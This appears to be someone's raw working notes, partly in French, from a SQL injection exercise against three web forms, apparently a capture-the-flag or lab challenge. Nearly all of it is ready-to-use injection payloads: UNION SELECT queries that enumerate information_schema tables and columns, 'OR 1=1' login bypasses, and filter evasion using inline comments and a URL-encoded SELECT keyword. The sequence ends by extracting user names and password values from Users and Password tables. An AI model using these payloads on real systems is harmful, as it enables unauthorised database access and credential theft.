"""
'union select table_name,0 from information_schema.tables#
'union select 0,column_name from information_schema.columns where table_name='cooperatives'#
'union select 0,column_name from information_schema.columns where table_name='cooperatives'#
"""
#Form2
'union select 0,column_name from information_schema.columns where table_name='Users'#
'union select id,nom,prenom from Users#
-> <Nom>

'union select id,prenom from Users#
-> <Prenom>

#Form1
'OR 1=1 #
<Tel> & <Adresse>

#Form3

'OR/**/1=1#
<Date> & <Heure>

#Form1

'union select table_name,0,0,0,0 from information_schema.tables#
'union select 0,column_name,0,0,0 from information_schema.columns where table_name='Contact'#
'union select 0,column_name,0,0,0 from information_schema.columns where table_name='user_variables'#
'union select VARIABLE_NAME,VARIABLE_VALUE,VARIABLE_TYPE,CHARACTER_SET_NAME from user_variables#

->le mdp n'est pas là

#Form3
#url encode pour avoir le select

'union/**/%53%45%4c%45%43%54/**/0,0,table_name/**/from/**/information_schema.tables#
'union/**/%53%45%4c%45%43%54/**/0,column_name/**/from/**/information_schema.columns/**/where/**/table_name='Password'#
'union/**/%53%45%4c%45%43%54/**/id,mdp,0/**/from/**/Password#

<Mdp>
